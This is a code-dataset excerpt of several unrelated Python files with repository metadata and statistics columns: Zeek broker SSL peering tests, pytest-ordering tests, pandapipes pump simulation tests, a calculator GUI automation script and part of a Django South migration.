hugolin615/zeek-4.0.0-ele420520-spring2021
|
258e9b2ee1f2a4bd45c6332a75304793b7d44d40
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import multiprocessing
import sys
import time
import os.path
import broker
def data_path(file):
base = os.path.realpath(__file__)
return os.path.join(os.path.join(os.path.dirname(base), "certs"), file)
class TestSSL(unittest.TestCase):
def check_ping(self, ep1, s1, ep2, s2):
ep2.publish("/test", ["ping"])
(t, d) = s1.get()
self.assertEqual(t, "/test")
self.assertEqual(d[0], "ping")
ep1.publish(t, ["pong"])
(t, d) = s2.get()
self.assertEqual(t, "/test")
self.assertEqual(d[0], "pong")
def test_ssl_auth_success_ca(self):
cfg = broker.Configuration(broker.BrokerOptions())
cfg.openssl_certificate = data_path("cert.1.pem")
cfg.openssl_key = data_path("key.1.pem")
cfg.openssl_cafile = data_path("ca.pem")
with broker.Endpoint(cfg) as ep1, \
broker.Endpoint(cfg) as ep2, \
ep1.make_subscriber("/test") as s1, \
ep2.make_subscriber("/test") as s2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, True)
self.check_ping(ep1, s1, ep2, s2)
def test_ssl_auth_success_ca_pw(self):
cfg = broker.Configuration(broker.BrokerOptions())
cfg.openssl_certificate = data_path("cert.1.pem")
cfg.openssl_key = data_path("key.1.enc.pem")
cfg.openssl_cafile = data_path("ca.pem")
cfg.openssl_passphrase = "12345"
with broker.Endpoint(cfg) as ep1, \
broker.Endpoint(cfg) as ep2, \
ep1.make_subscriber("/test") as s1, \
ep2.make_subscriber("/test") as s2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, True)
self.check_ping(ep1, s1, ep2, s2)
def test_ssl_auth_success_self_signed(self):
cfg = broker.Configuration(broker.BrokerOptions())
cfg.openssl_certificate = data_path("cert.self-signed.pem")
cfg.openssl_key = data_path("key.self-signed.pem")
cfg.openssl_cafile = data_path("cert.self-signed.pem")
with broker.Endpoint(cfg) as ep1, \
broker.Endpoint(cfg) as ep2, \
ep1.make_subscriber("/test") as s1, \
ep2.make_subscriber("/test") as s2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, True)
self.check_ping(ep1, s1, ep2, s2)
def test_ssl_auth_failure_self_signed(self):
cfg1 = broker.Configuration(broker.BrokerOptions())
cfg1.openssl_certificate = data_path("cert.1.pem")
cfg1.openssl_key = data_path("key.1.pem")
cfg1.openssl_cafile = data_path("ca.pem")
cfg2 = broker.Configuration(broker.BrokerOptions())
cfg2.openssl_certificate = data_path("cert.self-signed.pem")
cfg2.openssl_key = data_path("key.self-signed.pem")
cfg2.openssl_cafile = data_path("cert.self-signed.pem")
with broker.Endpoint(cfg1) as ep1, \
broker.Endpoint(cfg2) as ep2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, False)
with broker.Endpoint(cfg2) as ep1, \
broker.Endpoint(cfg1) as ep2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, False)
def test_ssl_auth_failure_no_auth(self):
cfg1 = broker.Configuration(broker.BrokerOptions())
cfg1.openssl_certificate = data_path("cert.1.pem")
cfg1.openssl_key = data_path("key.1.pem")
cfg1.openssl_cafile = data_path("ca.pem")
cfg2 = broker.Configuration(broker.BrokerOptions())
with broker.Endpoint(cfg1) as ep1, \
broker.Endpoint(cfg2) as ep2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, False)
with broker.Endpoint(cfg2) as ep1, \
broker.Endpoint(cfg1) as ep2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, False)
def test_ssl_auth_failure_no_ssl(self):
cfg1 = broker.Configuration(broker.BrokerOptions())
cfg1.openssl_certificate = data_path("cert.1.pem")
cfg1.openssl_key = data_path("key.1.pem")
cfg1.openssl_cafile = data_path("ca.pem")
cfg2 = broker.Configuration(broker.BrokerOptions())
with broker.Endpoint(cfg1) as ep1, \
broker.Endpoint(cfg2) as ep2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, False)
with broker.Endpoint(cfg2) as ep1, \
broker.Endpoint(cfg1) as ep2:
port = ep1.listen("127.0.0.1", 0)
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, False)
def XXXtest_ssl_auth_failure_ca_pw(self):
cfg = broker.Configuration(broker.BrokerOptions())
cfg.openssl_certificate = data_path("cert.1.pem")
cfg.openssl_key = data_path("key.1.enc.pem")
cfg.openssl_cafile = data_path("ca.pem")
cfg.openssl_passphrase = "WRONG PASSWORD"
with broker.Endpoint(cfg) as ep1, \
broker.Endpoint(cfg) as ep2:
port = ep1.listen("127.0.0.1", 0)
# TODO: This correctly generates an exception in CAF, for which I
# don't know where to catch it.
r = ep2.peer("127.0.0.1", port, 0)
self.assertEqual(r, False)
if __name__ == '__main__':
unittest.main(verbosity=3)
| 34.771084
| 77
| 0.587838
| 791
| 5,772
| 4.154235
| 0.120101
| 0.060864
| 0.030432
| 0.036519
| 0.872489
| 0.860012
| 0.8521
| 0.851187
| 0.804626
| 0.78028
| 0
| 0.062292
| 0.27131
| 5,772
| 165
| 78
| 34.981818
| 0.718973
| 0.016112
| 0
| 0.707317
| 0
| 0
| 0.096723
| 0
| 0
| 0
| 0
| 0.006061
| 0.113821
| 1
| 0.073171
| false
| 0.01626
| 0.04878
| 0
| 0.138211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22b47b04e84cc1b8707d921907321abe58d346ef
| 5,423
|
py
|
Python
|
tests/test_ordering.py
|
annuupadhyayPS/pytest-ordering
|
b9b01780be446aa082f88061efcbda32a85e19f8
|
[
"MIT"
] | null | null | null |
tests/test_ordering.py
|
annuupadhyayPS/pytest-ordering
|
b9b01780be446aa082f88061efcbda32a85e19f8
|
[
"MIT"
] | null | null | null |
tests/test_ordering.py
|
annuupadhyayPS/pytest-ordering
|
b9b01780be446aa082f88061efcbda32a85e19f8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import re
import pytest
pytest_plugins = ['pytester']
@pytest.fixture
def item_names_for(testdir):
def _item_names_for(tests_content):
# some strange code to extract sorted items
items = testdir.getitems(tests_content)
hook = items[0].config.hook
hook.pytest_collection_modifyitems(session=items[0].session,
config=items[0].config, items=items)
return [item.name for item in items]
return _item_names_for
def test_no_marks(item_names_for):
tests_content = """
def test_1(): pass
def test_2(): pass
"""
assert item_names_for(tests_content) == ['test_1', 'test_2']
def test_first_mark(item_names_for):
tests_content = """
import pytest
def test_1(): pass
@pytest.mark.first
def test_2(): pass
"""
assert item_names_for(tests_content) == ['test_2', 'test_1']
def test_last_mark(item_names_for):
tests_content = """
import pytest
@pytest.mark.last
def test_1(): pass
def test_2(): pass
"""
assert item_names_for(tests_content) == ['test_2', 'test_1']
def test_first_last_marks(item_names_for):
tests_content = """
import pytest
@pytest.mark.last
def test_1(): pass
@pytest.mark.first
def test_2(): pass
def test_3(): pass
"""
assert item_names_for(tests_content) == ['test_2', 'test_3', 'test_1']
def test_order_marks(item_names_for):
tests_content = """
import pytest
@pytest.mark.run(order=-1)
def test_1(): pass
@pytest.mark.run(order=-2)
def test_2(): pass
@pytest.mark.run(order=1)
def test_3(): pass
"""
assert item_names_for(tests_content) == ['test_3', 'test_2', 'test_1']
def test_non_contiguous_positive(item_names_for):
tests_content = """
import pytest
@pytest.mark.run(order=10)
def test_1(): pass
@pytest.mark.run(order=20)
def test_2(): pass
@pytest.mark.run(order=5)
def test_3(): pass
"""
assert item_names_for(tests_content) == ['test_3', 'test_1', 'test_2']
def test_non_contiguous_negative(item_names_for):
tests_content = """
import pytest
@pytest.mark.run(order=-10)
def test_1(): pass
@pytest.mark.run(order=-20)
def test_2(): pass
@pytest.mark.run(order=-5)
def test_3(): pass
"""
assert item_names_for(tests_content) == ['test_2', 'test_1', 'test_3']
def test_non_contiguous_inc_zero(item_names_for):
tests_content = """
import pytest
@pytest.mark.run(order=10)
def test_1(): pass
@pytest.mark.run(order=20)
def test_2(): pass
@pytest.mark.run(order=5)
def test_3(): pass
@pytest.mark.run(order=-10)
def test_4(): pass
@pytest.mark.run(order=-20)
def test_5(): pass
@pytest.mark.run(order=-5)
def test_6(): pass
@pytest.mark.run(order=0)
def test_7(): pass
"""
assert item_names_for(tests_content) == ['test_7', 'test_3', 'test_1', 'test_2', 'test_5', 'test_4', 'test_6']
def test_non_contiguous_inc_none(item_names_for):
tests_content = """
import pytest
@pytest.mark.run(order=5)
def test_1(): pass
@pytest.mark.run(order=0)
def test_2(): pass
@pytest.mark.run(order=1)
def test_3(): pass
@pytest.mark.run(order=-1)
def test_4(): pass
@pytest.mark.run(order=-5)
def test_5(): pass
def test_6(): pass
"""
assert item_names_for(tests_content) == ['test_2', 'test_3', 'test_1', 'test_6', 'test_5', 'test_4']
def test_first_mark_class(item_names_for):
tests_content = """
import pytest
def test_1(): pass
@pytest.mark.first
class TestSuite(object):
def test_3(self): pass
def test_2(self): pass
"""
assert item_names_for(tests_content) == ['test_3', 'test_2', 'test_1']
def test_last_mark_class(item_names_for):
tests_content = """
import pytest
@pytest.mark.last
class TestSuite(object):
def test_1(self): pass
def test_2(self): pass
def test_3(): pass
"""
assert item_names_for(tests_content) == ['test_3', 'test_1', 'test_2']
def test_first_last_mark_class(item_names_for):
tests_content = """
import pytest
@pytest.mark.last
class TestLast(object):
def test_1(self): pass
def test_2(self): pass
def test_3(): pass
@pytest.mark.first
class TestFirst(object):
def test_4(self): pass
def test_5(self): pass
"""
assert item_names_for(tests_content) == ['test_4', 'test_5', 'test_3', 'test_1', 'test_2']
def test_order_mark_class(item_names_for):
tests_content = """
import pytest
@pytest.mark.run(order=-1)
class TestLast(object):
def test_1(self): pass
def test_2(self): pass
@pytest.mark.run(order=0)
def test_3(): pass
@pytest.mark.run(order=-2)
class TestFirst(object):
def test_4(self): pass
def test_5(self): pass
"""
assert item_names_for(tests_content) == ['test_3', 'test_4', 'test_5', 'test_1', 'test_2']
def test_markers_registered(capsys):
pytest.main(['--markers'])
out, err = capsys.readouterr()
assert '@pytest.mark.run' in out
assert '@pytest.mark.first' in out
assert '@pytest.mark.last' in out
assert out.count('Provided by pytest-ordering') == 17
| 19.507194
| 114
| 0.627881
| 790
| 5,423
| 4.025316
| 0.097468
| 0.134277
| 0.109434
| 0.14434
| 0.816981
| 0.763836
| 0.740881
| 0.727673
| 0.615723
| 0.612893
| 0
| 0.031662
| 0.231237
| 5,423
| 277
| 115
| 19.577617
| 0.731111
| 0.011617
| 0
| 0.761905
| 0
| 0
| 0.557588
| 0.115736
| 0
| 0
| 0
| 0
| 0.10119
| 1
| 0.095238
| false
| 0.279762
| 0.083333
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
22e8211fdccf137fcf923e1a1de21f874d941cd6
| 7,840
|
py
|
Python
|
pandapipes/test/api/test_components/test_pump.py
|
nsanina/pandapipes
|
b2daaca6b83e7d8934502796721846bd9d552364
|
[
"BSD-3-Clause"
] | null | null | null |
pandapipes/test/api/test_components/test_pump.py
|
nsanina/pandapipes
|
b2daaca6b83e7d8934502796721846bd9d552364
|
[
"BSD-3-Clause"
] | null | null | null |
pandapipes/test/api/test_components/test_pump.py
|
nsanina/pandapipes
|
b2daaca6b83e7d8934502796721846bd9d552364
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2020 by Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
import pandapipes
import os
import pytest
import numpy as np
import pandas as pd
from pandapipes.test.pipeflow_internals import internals_data_path
def test_pump_from_measurement_parameteres():
"""
:return:
:rtype:
"""
net = pandapipes.create_empty_network("net", add_stdtypes=False)
j1 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j2 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j3 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j4 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
pandapipes.create_pipe_from_parameters(net, j1, j2, k_mm=1., length_km=0.43380,
diameter_m=0.1022)
pandapipes.create_pipe_from_parameters(net, j3, j4, k_mm=1., length_km=0.26370,
diameter_m=0.1022)
pandapipes.create_ext_grid(net, j1, 5, 283.15, type="p")
pandapipes.create_pump_from_parameters(net, j2, j3, 'P1', [6.1, 5.8, 4], [0, 19, 83], 2)
pandapipes.create_sink(net, j4, 0.02333)
pandapipes.create_fluid_from_lib(net, "lgas", overwrite=True)
pandapipes.pipeflow(net, stop_condition="tol", iter=3, friction_model="nikuradse",
mode="hydraulics", transient=False, nonlinear_method="automatic",
tol_p=1e-4,
tol_v=1e-4)
data = pd.read_csv(os.path.join(internals_data_path, "test_pump.csv"), sep=';')
res_junction = net.res_junction.p_bar.values
res_pipe = net.res_pipe.v_mean_m_per_s.values
p_diff = np.abs(1 - res_junction / data['p'].dropna().values)
v_diff = np.abs(1 - res_pipe / data['v'].dropna().values)
assert np.all(p_diff < 0.01)
assert np.all(v_diff < 0.01)
def test_pump_from_regression_parameteres():
"""
:return:
:rtype:
"""
net = pandapipes.create_empty_network("net", add_stdtypes=False)
j1 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j2 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j3 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j4 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
pandapipes.create_pipe_from_parameters(net, j1, j2, k_mm=1., length_km=0.43380,
diameter_m=0.1022)
pandapipes.create_pipe_from_parameters(net, j3, j4, k_mm=1., length_km=0.26370,
diameter_m=0.1022)
pandapipes.create_ext_grid(net, j1, 5, 283.15, type="p")
pandapipes.create_pump_from_parameters(net, j2, j3, 'P1',
poly_coefficents=[-1.48620799e-04, -1.29656785e-02,
6.10000000e+00])
pandapipes.create_sink(net, j4, 0.02333)
pandapipes.create_fluid_from_lib(net, "lgas", overwrite=True)
pandapipes.pipeflow(net, stop_condition="tol", iter=3, friction_model="nikuradse",
mode="hydraulics", transient=False, nonlinear_method="automatic",
tol_p=1e-4,
tol_v=1e-4)
data = pd.read_csv(os.path.join(internals_data_path, "test_pump.csv"), sep=';')
res_junction = net.res_junction.p_bar.values
res_pipe = net.res_pipe.v_mean_m_per_s.values
p_diff = np.abs(1 - res_junction / data['p'].dropna().values)
v_diff = np.abs(1 - res_pipe / data['v'].dropna().values)
assert np.all(p_diff < 0.01)
assert np.all(v_diff < 0.01)
def test_pump_from_std_type():
"""
:return:
:rtype:
"""
net = pandapipes.create_empty_network("net", add_stdtypes=True)
j1 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j2 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j3 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j4 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
pandapipes.create_pipe(net, j1, j2, std_type='125_PE_80_SDR_11', k_mm=1., length_km=0.43380)
pandapipes.create_pipe(net, j3, j4, std_type='125_PE_80_SDR_11', k_mm=1., length_km=0.26370)
pandapipes.create_ext_grid(net, j1, 5, 283.15, type="p")
pandapipes.create_pump(net, j2, j3, std_type='P1')
pandapipes.create_sink(net, j4, 0.02333)
pandapipes.create_fluid_from_lib(net, "lgas", overwrite=True)
pandapipes.pipeflow(net, stop_condition="tol", iter=3, friction_model="nikuradse",
mode="hydraulics", transient=False, nonlinear_method="automatic",
tol_p=1e-4,
tol_v=1e-4)
data = pd.read_csv(os.path.join(internals_data_path, "test_pump.csv"), sep=';')
res_junction = net.res_junction.p_bar.values
res_pipe = net.res_pipe.v_mean_m_per_s.values
p_diff = np.abs(1 - res_junction / data['p'].dropna().values)
v_diff = np.abs(1 - res_pipe / data['v'].dropna().values)
assert np.all(p_diff < 0.01)
assert np.all(v_diff < 0.01)
def test_pump_bypass_on_reverse_flow():
"""
reverse flow = no pressure lift
:return:
:rtype:
"""
net = pandapipes.create_empty_network("net", add_stdtypes=True)
j1 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j2 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j3 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j4 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
pandapipes.create_pipe(net, j1, j2, std_type='125_PE_80_SDR_11', k_mm=1., length_km=10)
pandapipes.create_pipe(net, j3, j4, std_type='125_PE_80_SDR_11', k_mm=1., length_km=12)
pandapipes.create_ext_grid(net, j1, 5, 283.15, type="p")
pandapipes.create_pump(net, j2, j3, std_type='P1')
pandapipes.create_source(net, j4, 0.02333)
pandapipes.create_fluid_from_lib(net, "hgas", overwrite=True)
pandapipes.pipeflow(net, stop_condition="tol", iter=3, friction_model="nikuradse",
mode="hydraulics", transient=False, nonlinear_method="automatic",
tol_p=1e-4, tol_v=1e-4)
assert net.res_pump.deltap_bar.isin([0]).all()
assert np.isclose(net.res_junction.loc[1, "p_bar"], net.res_junction.loc[2, "p_bar"])
def test_pump_bypass_high_vdot():
"""
High flow: pressure lift not <0, always >=0
:return:
:rtype:
"""
net = pandapipes.create_empty_network("net", add_stdtypes=True)
j1 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j2 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j3 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j4 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
pandapipes.create_pipe(net, j1, j2, std_type='2000_ST<16', k_mm=0.1, length_km=0.1)
pandapipes.create_pipe(net, j3, j4, std_type='2000_ST<16', k_mm=0.1, length_km=0.1)
pandapipes.create_ext_grid(net, j1, 5, 283.15, type="p")
pandapipes.create_pump(net, j2, j3, std_type='P1')
pandapipes.create_sink(net, j4, 1000)
pandapipes.create_fluid_from_lib(net, "hgas", overwrite=True)
pandapipes.pipeflow(net, stop_condition="tol", iter=30, friction_model="nikuradse",
mode="hydraulics", transient=False, nonlinear_method="automatic",
tol_p=1e-4, tol_v=1e-4)
assert net.res_pump.deltap_bar.isin([0]).all()
assert np.isclose(net.res_junction.loc[1, "p_bar"], net.res_junction.loc[2, "p_bar"])
if __name__ == '__main__':
n = pytest.main(["test_pump.py"])
| 41.481481
| 99
| 0.654719
| 1,189
| 7,840
| 4.055509
| 0.149706
| 0.182497
| 0.099544
| 0.111987
| 0.88428
| 0.88428
| 0.88428
| 0.882207
| 0.879925
| 0.879925
| 0
| 0.075218
| 0.21148
| 7,840
| 189
| 100
| 41.481481
| 0.704788
| 0.052806
| 0
| 0.777778
| 0
| 0
| 0.05175
| 0
| 0
| 0
| 0
| 0
| 0.08547
| 1
| 0.042735
| false
| 0.017094
| 0.051282
| 0
| 0.094017
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3bf29fdadd5bf1182a1728a80e70b5f6f09bc4d
| 2,783
|
py
|
Python
|
test/gui_test/calculator/calculator.py
|
JE-Chen/AutoControl
|
c2d78f0b428d27aef2ea27f210d11c6dc1144221
|
[
"MIT"
] | 1
|
2022-03-27T14:59:45.000Z
|
2022-03-27T14:59:45.000Z
|
test/gui_test/calculator/calculator.py
|
JE-Chen/AutoControl
|
c2d78f0b428d27aef2ea27f210d11c6dc1144221
|
[
"MIT"
] | 2
|
2021-11-19T13:45:37.000Z
|
2021-12-03T12:25:28.000Z
|
test/gui_test/calculator/calculator.py
|
JE-Chen/AutoControl
|
c2d78f0b428d27aef2ea27f210d11c6dc1144221
|
[
"MIT"
] | null | null | null |
import os
import subprocess
from time import sleep
from je_auto_control import locate_and_click
"""
開啟windows 計算機
並累加1至9
open windows calc.exe
and calculate 1 + 2 .... + 9
"""
subprocess.Popen("calc", stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True)
sleep(3)
locate_and_click(
"../../test_source/1.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/plus.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/2.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/equal.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/plus.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/3.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/plus.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/4.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/plus.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/5.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/plus.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/6.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/plus.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/7.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/plus.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/8.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/plus.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/9.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
locate_and_click(
"../../test_source/equal.png",
mouse_keycode="mouse_left",
detect_threshold=0.9,
draw_image=False
)
| 21.244275
| 90
| 0.682716
| 383
| 2,783
| 4.603133
| 0.127937
| 0.102099
| 0.15882
| 0.193988
| 0.875213
| 0.8616
| 0.8616
| 0.8616
| 0.8616
| 0.8616
| 0
| 0.022776
| 0.163852
| 2,783
| 130
| 91
| 21.407692
| 0.734852
| 0
| 0
| 0.716667
| 0
| 0
| 0.245283
| 0.173511
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.033333
| 0
| 0.033333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
43020e73a1bb2e3b4968dbd9aad04a2999e88bda
| 6,251
|
py
|
Python
|
whisk_tutorial/migrations/0005_auto__chg_field_tutorialuser_http_user_agent__chg_field_tutorialuser_h.py
|
apache/openwhisk-tutorial
|
f3d4e1ef8eb41462cff525df02dbbdd4998e471a
|
[
"Apache-2.0"
] | 2
|
2019-12-23T19:11:48.000Z
|
2021-11-10T15:53:41.000Z
|
whisk_tutorial/migrations/0005_auto__chg_field_tutorialuser_http_user_agent__chg_field_tutorialuser_h.py
|
tspannhw/incubator-openwhisk-tutorial
|
f3d4e1ef8eb41462cff525df02dbbdd4998e471a
|
[
"Apache-2.0"
] | 5
|
2019-08-15T15:31:21.000Z
|
2019-08-15T15:32:00.000Z
|
whisk_tutorial/migrations/0005_auto__chg_field_tutorialuser_http_user_agent__chg_field_tutorialuser_h.py
|
tspannhw/incubator-openwhisk-tutorial
|
f3d4e1ef8eb41462cff525df02dbbdd4998e471a
|
[
"Apache-2.0"
] | 2
|
2021-11-04T12:32:33.000Z
|
2021-11-10T15:53:32.000Z
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'TutorialUser.http_user_agent'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_user_agent', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_real_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_real_remote_address', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_remote_address', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_accept_language'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_accept_language', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_referrer'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_referrer', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.session_key'
db.alter_column(u'whisk_tutorial_tutorialuser', 'session_key', self.gf('django.db.models.fields.CharField')(unique=True, max_length=40))
# Adding unique constraint on 'TutorialUser', fields ['session_key']
db.create_unique(u'whisk_tutorial_tutorialuser', ['session_key'])
def backwards(self, orm):
# Removing unique constraint on 'TutorialUser', fields ['session_key']
db.delete_unique(u'whisk_tutorial_tutorialuser', ['session_key'])
# Changing field 'TutorialUser.http_user_agent'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_user_agent', self.gf('django.db.models.fields.CharField')(max_length=256))
# Changing field 'TutorialUser.http_real_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_real_remote_address', self.gf('django.db.models.fields.CharField')(max_length=32))
# Changing field 'TutorialUser.http_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_remote_address', self.gf('django.db.models.fields.CharField')(max_length=32))
# Changing field 'TutorialUser.http_accept_language'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_accept_language', self.gf('django.db.models.fields.CharField')(max_length=128))
# Changing field 'TutorialUser.http_referrer'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_referrer', self.gf('django.db.models.fields.CharField')(max_length=128))
# Changing field 'TutorialUser.session_key'
db.alter_column(u'whisk_tutorial_tutorialuser', 'session_key', self.gf('django.db.models.fields.CharField')(max_length=80))
models = {
u'whisk_tutorial.whiskfileevent': {
'Meta': {'object_name': 'DockerfileEvent'},
'errors': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'level': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['whisk_tutorial.TutorialUser']"})
},
u'whisk_tutorial.subscriber': {
'Meta': {'unique_together': "(('email', 'from_level'),)", 'object_name': 'Subscriber'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '80'}),
'from_level': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['whisk_tutorial.TutorialUser']"})
},
u'whisk_tutorial.tutorialevent': {
'Meta': {'object_name': 'TutorialEvent'},
'command': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '80', 'blank': 'True'}),
'feedback': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '2000', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['whisk_tutorial.TutorialUser']"})
},
u'whisk_tutorial.tutorialuser': {
'Meta': {'object_name': 'TutorialUser'},
'http_accept_language': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_real_remote_address': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_referrer': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_remote_address': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_user_agent': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
